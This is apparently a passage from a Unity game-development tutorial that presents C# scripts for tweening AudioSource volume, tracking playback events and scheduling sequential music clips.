The first case is applicable when using the debugger. Time information is provided from the debugger. The information is not available when the debugger is detached from the target board. The second example shows how to manage the time without using the debugger.
If the debugger is available, the application can use the data/time library, and you do not need to implement anything else in order to manage time information. Below are two code examples: one using clock() and the other using time().
You can get the elapsed time from the system start by using a clock in the following way:
clock_t clk_time;
clk_time = clock ();
printf ("clock time:% dsec \ n", clk_time / CLOCKS_PER_SEC);
You can also use string display conversion to get the date and time:
time_t now;
struct tm * ts;
char buf [80];
now = time (NULL);
ts = localtime (& now);
strftime (buf, sizeof (buf), "% a% Y-% m-% d% H:% M:% S% Z", ts);
printf ("% s \ n", buf);
This is the result of the above code examples:
clock time: 234sec
Sat 2015-07-11 00:11:40
...
Without the debugger, the application must implement the low-level implementation of the date and time library. If you are using an RTOS, similar functions might be provided and you can use those.
The below example is for an ARM Cortex-M device, which has a Systick timer. The timer makes it easy to implement data and time functions. In this example, SysTick generates an interrupt every 1 msec.
We define two variables for time and clock and define CLOCKS_PER_SEC as ticks in one second:
#define CLOCKS_PER_SEC (1000)
clock_t clk_count = 0;
time_t time_dat;
We create an interrupt handler for the SysTick. 64bit variable is recommended for clk_count to avoid overflow. When an interrupt is generated, clk_count is incremented and time_dat is incremented if one second passes:
void SysTick_Handler (void) {
clk_count ++;
if ((clk_count% 1000) == 0) {
time_dat ++;
}
}
Two functions are implemented using variables:
clock_t clock (void) {
return (clk_count);
}
time_t __time32 (time_t * p) {
return time_dat;
}
The variable "clk_count" is initialized to 0 since clock() returns the elapsed time. The variable, "time_dat" should be initialized to the current time. We can use a conversion function to initialize it. This example uses mktime for the conversion:
struct tm orig;
orig.tm_sec = 10;
orig.tm_min = 46;
orig.tm_hour = 9;
orig.tm_mday = 10;
orig.tm_mon = 6;
orig.tm_year = 115;
orig.tm_wday = 5;
orig.tm_yday = 19;
orig.tm_isdst = -1;
time_dat = mktime (& org);
This gives the date: Fri Jul 10 09:46:10 2015
As a result, every call of the SysTick handler updates the variables. By applying these low level implementations, you can use the clock and time functions on your application.
Standard C library date and time operations implemented in time.h can be used in IAR Embedded Workbench. You can use these functions without writing a low-level implementation by using information provided by the debugger. If you want to use the library without using the debugger, you can implement low-level code as described in this article in order to use the date and time functions.
This article is written by Hiroki Akaboshi, Field Applications Engineer at IAR Systems Japan.
|
https://www.iar.com/support/resources/articles/using-c-standard-library-time-and-clock-functions/
|
CC-MAIN-2017-26
|
refinedweb
| 648
| 63.7
|
HCM Processes & Forms: Making sense of the new SAP tutorial using FPM
Being “new” to HCM Processes and Forms (HCM P&F) can be daunting enough. Coming in at a time where we now have Adobe Interactive Forms, ABAP Floor Plan Manager (FPM) forms and possibly anything else (since it is pretty “open” now to any 3rd party to build “whatever” as the “data gathering”/form layer) all as possible solutions might qualify you as insane…or at the very least a masochist! (haha) Even those (of us) who might be versed in HCM P&F of the past and have experience with the “old” ways do need to keep up-to-date or be at risk of going the way of the dinosaurs.
With the “new” HR Renewal release with specific content and changes to HCM P&F, the most notable and exciting change in “our world” has to be the additional out-of-the-box/standard possibility of using ABAP WebDynpro forms (views) instead of Adobe Interactive Forms. This does not allow us to just create any old WDA view we like, however. We must do so using the FPM (Floor Plan Manager) framework. If you are use to WebDynpro ABAP programming and have used the FPM framework like some of us, this might come fairly easy. However, if you are not (or you just want to see how the “new” option is incorporated), you will most likely follow SAP’s newer HCM P&F tutorial….
“Tutorial: Create a Process Based on FPM Forms“
As you work through the tutorial however, some things are not completely spelled out for you or immediately obvious. I put together this blog to serve as a companion/expansion to the tutorial to hopefully help those working through it to overcome some of the headaches.
First off, if you are wondering why SAP uses the names they do for this tutorial, it is actually quite simple. In this tutorial, you will be instructed to define a form scenario called ZTFSWD and then attach this to a process you define as ZTPRWD. If you look at the naming, it is simply…”Z” for our custom namespace…”T” for tutorial…”FS” for form scenario or “PR” for process…and then “WD” for WebDynpro (you will notice many of the “old” sample processes do not have the “WD” at the end but do have the same naming)…..so, yeh…naming is pretty much up to you. (haha)
So now, let’s address some of the more confusing steps in the tutorial. From the first tutorial steps in,
Configuring a Form Scenario
In the section at the bottom….
Create the Form for a Form Scenario
- In the object hierarchy area, double-click Form. A blank FPM configuration table will appear.
There are four types of FPM configuration, which are as follows:
- Form – Display data using
a form. For details, see Creating a Form
Layout.
- List – Display or perform
operations on repeat fields of a single infotype record. For details, see Creating a List
Layout.
- List Complex – Display or
perform operations on multiple records of a single infotype. For details, see Creating a List Complex Layout.
- Composite – Group
multiple UIBBs within a single UIBB. For details, see Creating a
Composite Layout.
- Choose an appropriate FPM configuration type from the FPM configuration table. Enter a configuration ID and description and choose Create.
Step 2 here does not really tell you a whole lot or give you easy to follow instructions. The tutorial tells you all the FPM configuration options available but never says which one to pick or how to do it in order to move on in the tutorial, so try this….
2b. In the first column of the “FPM configuration table”, select: FORM (since we just need a simple form for this).
2c. In the second column (“Configuration ID”), enter your own “key ID” for you configuration. Now, you will find that for HCM P&F, SAP uses the following
naming convention:
WD_HRASR_<form id>
For your own, you must name yours in the customer namespace, so start with “Z” or “Y”. For ease, I adopt SAP’s naming
convention and simply add a “Z” to the front.
ZWD_HRASR_<form id>
2d. Add a description in the final column.
2e. click the “create” icon which will then create your actual FPM configuration (you might receive a pop-up window asking if you want to save your form scenario…if so, click the “YES” button). It will open a new browser window (since all FPM config work Is done in your browser and NOT in the SAP GUI).
EDIT: You may receive an error like “error “Configuration (YOUR CONFIG NAME) does not exist”. I do not know why SAP changed this but you can not easily create a configuration directly from here as you could when I originally wrote this (even on the version I am working with now, it throws this error). So here is the alternate steps….
- Go to SE80.
- From the “Repository Browser”, select “Web Dynpro Comp. / Intf.
- Now you will need to selected the correct Webdynpro component based on what time of UIBB type you need. Use the following:
- (C) Composite: FPM_COMPOSITE_UIBB
- (F) Form: FPM_FORM_UIBB_GL2
- (L) List: FPM_LIST_UIBB_ATS (you may only have FPM_LIST_UIBB. This is considered the newer version…ATS stands for ABAP Table Services)
- (M) List Complex: same as list (actually not used in any standard sample processes nor I have I had to use it)
To check these, you can look at standard class CL_HRASR00_DT_FSCN_DATA method CHECK_FORM_SCENARIO_FPM_CONF. You can also
see these defined as constants in IF_HRASR00_DT_CONSTANTS.
- After you select the one you need, look at the nodes/folders under it and find “Component Configurations”.
- Right click on that folder and select “Create”.
- This will launch the FLUID application in your web browser.
- Enter your new configuration ID in the right side input box and then click “new” icon.
- This will popup a window asking for the “Description” (just like you saw in the Design Time/HRASR_DT). Enter it and click “OK”.
- You will be asked for the “package” and such as normal for objects and transports.
- Next you will be asked for the feeder class. Enter the standard one used for HCM P&F…. CL_HRASR00_FPM_FEEDER.
- Click “Edit parameters” and enter/select your Form Scenario (and version if needed).
- Click “OK” and click “save” at the top. (You can close the browser now)
- Now, back over to HRASR_DT, you can put in your config ID for the form type selected.
Gee, SAP, thanks for making this soooo much harder now! haha
2f. You now have your FPM configuration to begin “building” your new form/page/screen/thingy.
Now, in the next part from the steps in,
Creating a Form and Editing the Layout
In the section….
Adding Fields to the Form
- Add a header to the form:
the FPM text view field from Repositories and drag and drop it on
to the form.
- Enter
the text Request
Relocation Benefit.
- Save
your entries.
You might not have the Repositories view visible. To make them visible, click the icon that looks like vertical split panes in the menu bar (shown in the image below and if you hover over the icon, the tooltip reads “Navigation & Repositories”):
Then from the repositories shown, you can locate the “FPM text view” field to add to the form as instructed.
Drag the field onto your form (ie. the “Preview” window). Then make sure you have your Attributes pane open (if not, click the icon in the menu bar to show attributes). Finally, you can enter the text “Request Relocation Benefit” into the attribute for the element.
You will follow similar steps to add the other fields as the guide instructs.
In the tutorial, you will see that they ask you to add the comments fields (new and previous comments) directly into your configuration, however, you will
see in SAP’s own examples (and is a better practice) that they put the comments into a separate configuration that is part of your FPM form configuration table. This is a better way to keep your comments fields consistent across forms as well as adding extra “nice” features (such as checking if “previous” comments are empty, and is so, simply hiding the field to clear of page space (ie. “screen real estate”).
So in my version of the tutorial, I made a separate configuration for comments:
Finally, we create the process in the last tutorial section:
Creating a Process
I will give you a little tip/hint here. You can follow the tutorial exactly as instructed. For the most part, you will be either reusing the workflow you defined if you did the “Non-FPM” tutorial or creating a new one to use for your process (note: you will have to chance some of the tasks as the FPM tasks are slightly different, but it is really just switching the “old” standard tasks for the “new” ones). This is very nicely laid out in the tutorial. However, if you want to bypass these steps and get right to testing your new process and FPM form immediately, you can do the following:
- Follow the steps in the tutorial to create the process, assign your form scenario to it and “start step”, assign imitator(s) and other “Start” information.
- In the step where you define the “workflow template” to use, instead of putting in an actual workflow ID, simply put in NO_WORKFLOW. This is an undocumented “feature” that will allow you to immediately launch (and save) a process/form. Keep in mind, this is only useful for testing single form scenario steps and will attempt to change data upon completion based on your configuration.
- Now, you can execute your “start” application, select your process, and test immediately.
- From the Design Time, you can select your
process and click the “test” icon.
- Fill in the initial information and make sure to
select the option for the “Web Dynpro Screen” at the bottom.
- Execute your test and view your nice new FPM form.
Hope this helps and eases people into HCM P&F a little more comfortably. As always….more blogs to come! You keep reading them, and I will keep churning them out. (haha) Till next time….
Hey Chris.. Thanks for sharing. I'm sure this will come in handy once we get HR Renewal installed (should be very soon). Question: Does this mean all that work we did enabling "Real Time" form field validation and lookups will be obsolete? (:->
First off, THANKS for the thanks. Second....as a good little consultant, I will answer with the consultant's motto..."It depends.". haha There are positive and negative reasons for using an Adobe form over WDA FPM. One that immediately comes to mind is that Adobe forms allow more "responsiveness" via JavaScript (not to mention some creative use of "user events" like we did together). Some of this is not possible with WDA FPM or has to be done in other ways...which opens up LOTS more blog topics for me! haha
Chris a.k.a "the godfather of forms"-
Thanks for another great blog.
Keep up the good work.
Thanks! I will keep going till people stop showing up...just like a true rock star eh? haha
Great work Chris, keep it up.
Thanks!
Nice job (as always) and have always enjoyed your blogging style. Keep up the great work.
On a side for folks that dont know....it was Chris that convinced me to start blogging on SCN many moons ago and so glad he did 🙂
Excellent job, Chris. Really appreciate your attention to detail. Keep it coming!
Thanks, Chris - what a great contribution!!
Awww shucks. Thanks for the kind words. I will keep putting out more as long as nice folks like you keep reading them.
Thanks Chris for nice blog again, Thank you very much!!!
Thanks!
Thank for your sharing on new tech.
Thanks YOU!
Thanks Chris for another good blog.
Hi Chris, Thanks for the great information. Is the tutorial relevant only to EhP 6 with HR Renewal 1.0? You might have said that somewhere and I missed it.
Many thanks! Monica
Yes, Monica...this is the newer HR Renewal based HCM P&F.....I thought I did say it, but really it is the FPM part that is important (as an option instead of Adobe). Thanks for checking it out!
Hi Monica,
The Floor Plan Manager (FPM) is an SAP view-editing tool which is the basis for the "form" editing part of the P&F Design-TIme (/HRASR_DT) in the backend. These FPM forms were introduces with HR Renewal 1.0. My thanks to Robert Moeller for his help in answering your question!
Thanks very much Chris, I was just waiting for this blog because I need implement for the first time WDA, this is new to me after working for years on Adobe Forms.
If you worked with the "old" way, you will be just fine. It really isn't much different....just a different "data gathering" UI. haha
Chris,
Did you figure out a way to add a picture in the form. I dont see any option in WD forms like it used to be in Adobe forms.
Regards,
Raghavendra Prabhu
Sorry. Did you figure this out? There is an "image" element you can add. Past that, you could make your own component and include it in the form (like my "Google" blog example you can find on here)
Thanks. Very nice!
A top blog post. I've just tweeting your SCN blog list as it's the must-have SCN resource for HCM Processes and Forms.
Thanks, Luke! I know it is a bit of a niche, but HCM P&F actually does touch a lot of the trickier technical side of HCM these days (decoupled infotypes, FPM framework, OADP, etc.). So even in some of my HCM P&F blogs, there are some nuggets of wisdom (?) that can and do apply to a broader crowd. =)
Chris,
Great tips. I am on a project where they are looking to replace their Adobe P&F with the new FPM forms and I am wondering how much of the existing config and workflow can be re-used. Would you say the Adobe form can be replaced and the existing Workflow and P&F config be re-used?
Regards
Rob Greenway
That is kinda the idea....just replace the "form" portion (UI) and all else remains the same. However, the devil is in the details...there will be some considerations to handle. For instance, if your Adobe forms are really JavaScript heavy, that kind of functionality had to be handled other ways in FPM-based forms. But for the most part, workflow (aside from changing binding names), backend services, and HCM P&F config should not change very much in most cases. I mean the "process" is still the same process after all, I would think. It is just presented in a different way now.
Excellent work as usual, what a good read Chris! So much to learn, I ll keep coming to your shows 🙂 .
Hi Chris,
This is a very good blog for the beginners in HCM Process and Forms using FPM form.All these points are basic but very useful and helpful.Thanks a lot for putting them together,Appreciate you effort!!!Carry on the good work!!!
Hi Chris,
We have Adobe forms on the portal and we now have FPM forms and NWBC. Are they fully interchangeable? i.e. Can you run Adobe forms on NWBC and FPM forms on Enterprise Portal? In all of the SAP documentation it doesnt say you can't but I wondered if there is some technical reason this cant be done?
Rob.
When you say "interchangeable" how do you mean? It is not as simple as "replace one with the other". There are considerations for each. BUT ....yes, they can be ported over and yes, they both can run in the portal and NWBC. Furthermore, keep in mind that with the release of the FPM option, SAP has now also "left the door open" for ANY other kind of form UI interface (ie. others from 3rd parties for example). I HIGHLY speculate that a HTML5 option will be coming soon as well since SAP is pushing it so much in other areas.
Hi Chris,
indeed it is a great post that helped a lot. the only thing I could not do is, increase the size of current and previous comments fields in the form. even dragging to make it bigger dont help at all. Wonder how would you make it big like a box. Currently it is like a regular input field.
In the "attributes" for your element, look for the Position section. You can set the "start row of element" and "end row of element" to set the HEIGHT and "start column of element" and "end column of element" to set the LENGTH. This allows you to adjust the "box" size of your comments fields.
Thanks Christopher,
Can you please help me in the below issue:
In my case the browser doen't open but I get an error "Configuration ZWD_HRASR_XXX does not exist". Do I need to create it before this step. Please guide me.
Regards,
Laxman
Updated blog to reference this.
Thanks Christopher.
Hello Chris.
Very nice and useful blog. I am stuck on your step 2e where you have added an EDIT (in the year 2015) to the original blog. Perhaps system setup has changed today versus when you had your blog posted.
My challenge is that we have two SAP clients; one for development and one for customizing. The Dev client can create the SE80 FPM Configurations and the Customizing client can create the HRASR_DT Form Scenarios.
So after I create FPM configuration in Dev client, I need to link the Feeder Class' parameters to the Form Scenario. Correct? Well, the challenge is that the Form Scenarios are only found in Customizing client, not DEV client. I also cannot go into Customizing client to edit the FPM configuration to do the linking.
So how to link the Form Scenario to the Feeder Class' parameter together when there are two separate clients being used? Without this step, I cannot continue to the Form Layout steps.
Thanks,
Ashish.
You would usually move the transport from one client to other (depending on your own company rules) WITHIN the same "box" using SC01 / SCC1.
Ok, I'll check with Basis if they allow this as we developers don't have access to SCC1. Maybe there is a table that I can search for where the Feeder Class Parameter is linked to the Form Scenario, and then update it directly in the Customizing client through SM30. But surprised that other folks don't have this problem as there isn't much written on this difficulty.
Thanks Chris for the tip.
Ashish.
Hi Christopher,
Thanks a lot for he document.
We have SSF system for HR and we want to integrate the Process and Forms in Service Requests for example we want to load process and form int o CRM (SSF) system based on catefgorization, I tied check some docs but could not find any concreate solution for the same.
Can you please help us on the same! that would great!
Regards,
Dhruvin
This is not related to this blog. Please ask elsewhere (forum discussion?) and what is SSF?
hi Christopher.. apologies 🙂
SSF is shared service framework with which one can access HR , FI , Logistic and can create service tickets and everything in CRM.. so SSF is basically a CRM 7.0 system with HR or FI or logistic.
Ah yeh...got ya now....know what it is.....some many three letter acronyms (TLA) haha
Hi Christopher
Thanks so much for the document and keeping it up to date! I just got through running into the error message on "Object Component Configuration does not exist" and was following the SAP tutorial which does not address this. I really appreciate the fact that you updated your instructions to include how to get past this.
Thanks!
very welcome...Thank you for reading it!
Hi Chris ,
We created a form process and accessing the form using the application ASR_PROCESS_EXECUTE_OVP and the application configuration ASR_PROCESS_EXECUTE_OVP_CFG .I created a new application configuration copied the component configuration ASR_PROCESS_EXECUTE_OVP_CFG into a 'Z' configuration because we wanted some custom buttons in the application .
When i add a button to the global tool bar that button is not appearing in the screen .When i debugged the core webdynpro component HRASR00_PROCESS_EXEC_ALT and found out that except 3 buttons all the rest are disabled and invisible . Eventhough i have enabled the button using code enhancement i am still not getting the button on the UI . Is there anything i am missing ?
Thanks , Ravi .
Hello, someone could suggest to me a book or ebook on ABAP HCM?
Thanks!
Google.
Hello Dhruvin Mehta!
It seems to me, the label says that we should first search on Google for questioning after the forum, but I have done, if this is a concern.
Well, Google gave me more consistent answers to this.
However, thanks.
Hi Christopher,
I’ve gained a lot of knowledge from your HCM Processes and Forms blogs and appreciate you investing the time and effort to prepare them. Just starting to look at the FPM option and ran into an issue developing my form. I added an Explanation field (FPM_FGL2_EXPLANATION) to my form. I can maintain the field’s Text attribute or its Text Document attribute, and the text will appear in the Preview pane in FLUID. But when I test my process, the Explanation field does not appear. Any idea what might be causing this behavior? There are no attributes for visibility.
Thanks!
Russell
First...THANKS!....Second....sorry, but I can't be much help. I don't use those texts much/often for much the very reason you said. If I want "static" text, but want to control it, I tend to make it a field on my HCM P&F form fields config, then I can set its visibility (as well as text) as I like in a generic service. I think I used the ones like you mention a while back and hit similar issues....don't remember.....deep into a global ESS project so my head has not been in HCM P&F in a while. haha
Thanks for the quick response. I will try the generic service approach.
Sadly all your links now fail to resolve, it looks like SAP have updated their site, so your links are no longer valid...! It's a shame as the official tutorials that SAP produce as opaque and not very helpful at all.
They are just the links to the exact spot in the tutorial in the SAP "help" documentation. You should be able to figure out where they go based on the section in the blog and description. .....and yes, agreed....SAP has problems with breaking links with a "redirect" backup plan. =)
|
https://blogs.sap.com/2013/06/18/hcm-processes-forms-making-sense-of-the-new-sap-tutorial-using-fpm/
|
CC-MAIN-2021-49
|
refinedweb
| 3,856
| 72.76
|
.
Audio Animation
Audio is just data and it has attributes that you can and probably will animate. Primarily you will animate volume. This can allow you to fade a track in or out, or crossfade between two music tracks, etc. We already have a reusable animation system in this project which we can easily extend for this feature. Add a new script called AudioSourceVolumeTweener and copy the following:
using UnityEngine; using System.Collections; public class AudioSourceVolumeTweener : Tweener { public AudioSource source { get { if (_source == null) _source = GetComponent<AudioSource>(); return _source; } set { _source = value; } } protected AudioSource _source; protected override void OnUpdate () { base.OnUpdate (); source.volume = currentValue; } }
Because the Tweener inherits from an EasingControl, it already has startValue, currentValue, and endValue fields. All we need is a float value to animate the volume of an audio source, so we can use these values directly – we simply pass the currentValue of the tweener to the AudioSource’s volume field in the OnUpdate callback and we’re done!
In order to trigger the animation of an AudioSource’s volume, it would be nice to add some more extensions like we have done for animating transforms, etc. Add another script named AudioSourceAnimationExtensions and copy the following:
using UnityEngine; using System; using System.Collections; public static class AudioSourceAnimationExtensions { public static Tweener VolumeTo (this AudioSource s, float volume) { return VolumeTo(s, volume, Tweener.DefaultDuration); } public static Tweener VolumeTo (this AudioSource s, float volume, float duration) { return VolumeTo(s, volume, duration, Tweener.DefaultEquation); } public static Tweener VolumeTo (this AudioSource s, float volume, float duration, Func<float, float, float, float> equation) { AudioSourceVolumeTweener tweener = s.gameObject.AddComponent<AudioSourceVolumeTweener>(); tweener.source = s; tweener.startValue = s.volume; tweener.endValue = volume; tweener.duration = duration; tweener.equation = equation; tweener.Play (); return tweener; } }
Hopefully this pattern will look familiar, we simply overloaded the VolumeTo method with a few different sets of parameters so you could be increasingly specific about “how” the volume changed. You may only care about the target volume level, but you might also want to choose how long it takes to get there or with what kind of animation curve it animates along. The less specific versions pass default values to the most specific version so that you only really implement the function once.
Cross Fade Demo
For example sake, here is a sample script which cross fades between two audio sources using our new Tweener subclass and extension. This script wont be included in the repository and it is included merely to demonstrate the potential use of our new feature.
using UnityEngine; using System.Collections; public class CrossFadeAudioDemo : MonoBehaviour { [SerializeField] AudioSource fadeInSource; [SerializeField] AudioSource fadeOutSource; void Start () { fadeInSource.volume = 0; fadeOutSource.volume = 1; fadeInSource.Play(); fadeOutSource.Play(); fadeInSource.VolumeTo(1); fadeOutSource.VolumeTo(0); } }
If you would like to test this demo, I would recommend you create a new scene. Next, add two audio sources which are preconfigured to use different audio clips. I set both of the audio sources to NOT play on awake so I could configure them first. Don’t forget to hook up the references for them to this script in the inspector. Press play. When the scene starts, it will configure one of the sources to have no volume and fade in, while the other will start at full volume and fade out. If you like you can add additional parameters to the VolumeTo statements such as providing a longer duration so that the effect is more obvious.
Audio Events
One feature I would love to see in Unity is a greater use of event driven programming. For example, it would be great to know when an audio source loops or completes playing. Lacking that, I can accomplish what I need with either a scheduled callback or a polling system. To schedule a callback you can use something like MonoBehaviour.Invoke and or MonoBehaviour.InvokeRepeating as a replacement for the lack of any completion event on the audio source. If you’re curious, those snippets might look something like the following:
float delay = source.clip.length - source.time; if (source.loop) InvokeRepeating("AudioSourceLooped", delay, source.clip.length); else Invoke("AudioSourceCompleted", delay);
Unfortunately I found that this was a pretty fragile approach. One problem is that an Audio Clip’s length in seconds doesn’t necessarily equate to how long an Audio Source will spend playing it. For example, if the pitch of an audio source is modified, then it can play the clip in more or less time depending on the new pitch.
Because I didn’t feel like running a bunch of tests on all of the variety of things which could potentially modify time in one form or another to mess up the timing with the invoke call, I decided to use the polling approach instead. This pattern is achieved through a coroutine. Add a new script called AudioTracker and copy the following:
using UnityEngine; using System; using System.Collections; public class AudioTracker : MonoBehaviour { #region Actions // Triggers when an audiosource isPlaying changes to true (play or unpause) public Action<AudioTracker> onPlay; // Triggers when an audiosource isPlaying changes to false without completing (pause) public Action<AudioTracker> onPause; // Triggers when an audiosource isPlaying changes to false (stop or played to end) public Action<AudioTracker> onComplete; // Triggers when an audiosource repeats public Action<AudioTracker> onLoop; #endregion #region Fields & Properties // If true, will automatically stop tracking an audiosource when it stops playing public bool autoStop = false; // The source that this component is tracking public AudioSource source { get; private set; } // The last tracked time of the audiosource private float lastTime; // The last tracked value for whether or not the audioSource was playing private bool lastIsPlaying; const string trackingCoroutine = "TrackSequence"; #endregion #region Public public void Track(AudioSource source) { Cancel(); this.source = source; if (source != null) { lastTime = source.time; lastIsPlaying = source.isPlaying; StartCoroutine(trackingCoroutine); } } public void Cancel() { StopCoroutine(trackingCoroutine); } #endregion #region Private IEnumerator TrackSequence () { while (true) { yield return null; SetTime(source.time); SetIsPlaying(source.isPlaying); } } void AudioSourceBegan () { if (onPlay != null) { onPlay(this); } } void AudioSourceLooped () { if (onLoop != null) onLoop(this); } void AudioSourceCompleted () { if (onComplete != null) onComplete(this); } void AudioSourcePaused () { if (onPause != null) onPause(this); } void SetIsPlaying (bool isPlaying) { if (lastIsPlaying == isPlaying) return; lastIsPlaying = isPlaying; if (isPlaying) AudioSourceBegan(); else if (Mathf.Approximately(source.time, 0)) AudioSourceCompleted(); else AudioSourcePaused(); if (isPlaying == false && autoStop == true) StopCoroutine(trackingCoroutine); } void SetTime (float time) { if (lastTime > time) { AudioSourceLooped(); } lastTime = time; } #endregion }
When you use this script it will cause a coroutine to track the playback of the audiosource on a frame by frame basis. Note that this means you won’t catch the exact moment that a bit of audio has completed or looped, but it should at least be very close – a game even running at 30 fps would be within a few hundreths of a second in accuracy. I would also point out that even if you could get an event at the exact moment an audio track completes that you would be unlikely to do much anyway since it would occur outside of unity’s execution thread and you wouldn’t be able to interact with any Unity objects.
It is important to note that several of the callbacks can be invoked by more than one audio event. For example, you would get the onPlay callback anytime the audiosource changes the isPlaying flag to true. This can happen either when Playing an audiosource for the first time, or as a result of Unpausing a paused audiosource. If you needed to know for certain how a callback was obtained (such as differentiating between “unpause” and “play”, or between a play to the end and “stop”) then you would need to wrap the relevant AudioSource methods. For example, you could implement a “Stop” method on the tracker, which then tells the tracked source to “Stop”, so that you would now be able to determine you had manually stopped playback instead of letting it play to the end and stopping on its own. I decided not to wrap these calls because it would be too easy to forget to use them and missed expectations might lead to some frustrating logic bugs.
I feel a lot more comfortable with this version over “Invoke”, because it doesn’t make any assumptions about the timing of the audio… well except for looping. You could always set the playback time manually which could cause the script to think it had looped. Otherwise, it should handle all of the use cases I can think of off the top of my head.
Loop Demo
Like the earlier demo, the following script also wont be included in the repository and it is included merely to demonstrate the potential use of audio events for looping and completion. In this demo, I setup a temporary scene with two audio sources. One was configured with the sound of a laser blast, and the other an explosion. Both audiosources were set not to play on awake, and the laser had loop enabled.
If you setup a similar scene and play it, you will see that the laser sound will play some random number of times (based on the loopCount variable) and on each loop, the loopStep variable will increment and I will change the pitch of the laser so that the next play through happens in a different amount of time (but also adds a nice bit of variance – you could do this for a lot of sound fx like footsteps, etc). When the desired number of loops has been achieved we disable the looping and wait for the audio source to complete. When that event is triggered I tell the explosion audio source to play.
using UnityEngine; using System.Collections; public class LoopDemo : MonoBehaviour { [SerializeField] AudioSource laser; [SerializeField] AudioSource explosion; AudioTracker tracker; int loopCount, loopStep; void Start () { loopCount = Random.Range(4, 10); tracker = gameObject.AddComponent<AudioTracker>(); tracker.onLoop = OnLoop; tracker.Track(laser); laser.Play(); } void OnLoop (AudioTracker sender) { laser.pitch = UnityEngine.Random.Range(0.5f, 1.5f); loopStep++; if (loopStep >= loopCount) { laser.loop = false; tracker.onComplete = OnComplete; } } void OnComplete (AudioTracker sender) { explosion.Play(); } }
Audio Sequence
The music that Brennan provided isn’t a normal music track – what I mean is that he provided two different assets that are meant to be used together. There is an intro music track, followed by a loopable music track. The loopable portion should play when the intro completes, and then continue playing for as long as this scene is active. Unfortunately this creates a particular problem for Unity, because Unity is not event driven and doesn’t allow you to interact with it on a background thread.
You might consider using the AudioTracker to accomplish this task, but it isn’t the ideal solution. The actual playback of the audio can complete in-between frames and in order to continue on with the next track without any noticeable hitches we will have to use another method Unity provides instead – PlayScheduled. This handy method has the benefit of making sure that music can begin even between frames and also that it will already be loaded and ready when the time comes to begin playing. Unfortunately, it isn’t a very smart method and requires a lot of hand holding and assumptions that I had hoped to avoid. To make things trickier, an AudioSource doesn’t provide a field representing its current state, or a variety of other important bits of data (at least not that I am aware of – feel free to correct me). Here are some gotchas I encountered:
- isPlaying will return true even while it is waiting to play (because it is scheduled) but of course you wont hear anything, nor will the time field be updated
- isPlaying will return false when it is paused and when it is stopped
- UnPause will cause a paused audiosource to set isPlaying back to true, but not a stopped audiosource
- There is no field that indicates the difference between a paused or stopped audiosource
- There is no field indicating whether an audiosource is currently scheduled to play or not
- There is nothing to tell you when a scheduled audiosource is scheduled to begin
- You can pause a scheduled audiosource, but it doesn’t delay the scheduled start time accordingly
In order to help manage all of this I created a few new classes. Create a new script called AudioSequenceData and copy the following:
using UnityEngine; using System.Collections; public class AudioSequenceData { #region Fields & Properties public double startTime { get; private set; } public readonly AudioSource source; public bool isScheduled { get { return startTime > 0; } } public double endTime { get { return startTime + source.clip.length; } } #endregion #region Constructor public AudioSequenceData (AudioSource source) { this.source = source; startTime = -1; } #endregion #region Public public void Schedule (double time) { if (isScheduled) source.SetScheduledStartTime(time); else source.PlayScheduled(time); startTime = time; } public void Stop () { startTime = -1; source.Stop(); } #endregion }
This class helps to control and track information on a single AudioSource. While Unity provided methods to schedule them, they didn’t provide a way to check when it was scheduled after the fact (again unless I missed it somewhere). Using this class, I can schedule a clip to play at a specific time, but then if I need to reschedule it, it will know it had already been scheduled and use the appropriate method to modify the schedule instead.
Next, we need something that can manage a list of these Data objects, and also manage pausing and resuming the sequence so that future scheduled clips will still play when you expect them to. Create a new script named AudioSequence and copy the following:
using UnityEngine; using System.Collections; using System.Collections.Generic; public class AudioSequence : MonoBehaviour { #region Enum private enum PlayMode { Stopped, Playing, Paused } #endregion #region Fields Dictionary<AudioClip, AudioSequenceData> playMap = new Dictionary<AudioClip, AudioSequenceData>(); PlayMode playMode = PlayMode.Stopped; double pauseTime; #endregion #region Public public void Play (params AudioClip[] clips) { if (playMode == PlayMode.Stopped) playMode = PlayMode.Playing; else if (playMode == PlayMode.Paused) UnPause(); double startTime = GetNextStartTime(); for (int i = 0; i < clips.Length; ++i) { AudioClip clip = clips[i]; AudioSequenceData data = GetData(clip); data.Schedule(startTime); startTime += clip.length; } } public void Pause () { if (playMode != PlayMode.Playing) return; playMode = PlayMode.Paused; pauseTime = AudioSettings.dspTime; foreach (AudioSequenceData data in playMap.Values) { data.source.Pause(); } } public void UnPause () { if (playMode != PlayMode.Paused) return; playMode = PlayMode.Playing; double elapsedTime = AudioSettings.dspTime - pauseTime; foreach (AudioSequenceData data in playMap.Values) { if (data.isScheduled) data.Schedule( data.startTime + elapsedTime ); data.source.UnPause(); } } public void Stop () { playMode = PlayMode.Stopped; foreach (AudioSequenceData data in playMap.Values) { data.Stop(); } } public AudioSequenceData GetData (AudioClip clip) { if (!playMap.ContainsKey(clip)) { AudioSource source = gameObject.AddComponent<AudioSource>(); source.clip = clip; playMap[clip] = new AudioSequenceData(source); } return playMap[clip]; } #endregion #region Private AudioSequenceData GetLast () { double highestEndTime = double.MinValue; AudioSequenceData lastData = null; foreach (AudioSequenceData data in playMap.Values) { if (data.isScheduled && data.endTime > highestEndTime) { highestEndTime = data.endTime; lastData = data; } } return lastData; } double GetNextStartTime () { AudioSequenceData lastToPlay = GetLast(); if (lastToPlay != null && lastToPlay.endTime > AudioSettings.dspTime) return lastToPlay.endTime; else return AudioSettings.dspTime; } #endregion }
At the top of this script we provided a PlayMode enum that could track the state of the whole sequence – whether Stopped or Playing etc. This helps overcome the lack of state information on AudioSources but also helps because this script manages multiple audiosources, some which may have already completed (and therefore be stopped).
When you want to add one or more AudioClips to the sequence, just call Play and pass them along. It shouldn’t matter if the sequence is already playing or paused, it will still add them to the end of the list and schedule them for playback accordingly.
I also provided Pause and Unpause which provide a convenient way to temporarily stop playback of an audiosource. This wont stop a scheduled playback, but it will reschedule the playback when you resume playing so that each track will play one after the other.
If you want to stop playback, including the scheduling of playback, you can use the Stop method.
You can get the AudioSequenceData for any clip by using the GetData method. This can let you know whether or not a clip is scheduled to play, and when it should start and stop playing. For the most part you probably wont need this, but its there for special cases.
The private method, GetLast returns the audio source that has the latest end time. It will be used to figure out the new start time of a clip which you would want to play at the end of the sequence.
The private method, GetNextStartTime will return the endTime of the last audio clip in the list if there is one – but it is possible that the endTime has completed in the past. To be safe, the method will return only values that are greater than or equal to the current AudioSettings.dspTime value so that new calls to play will start now or in the future.
Music Player
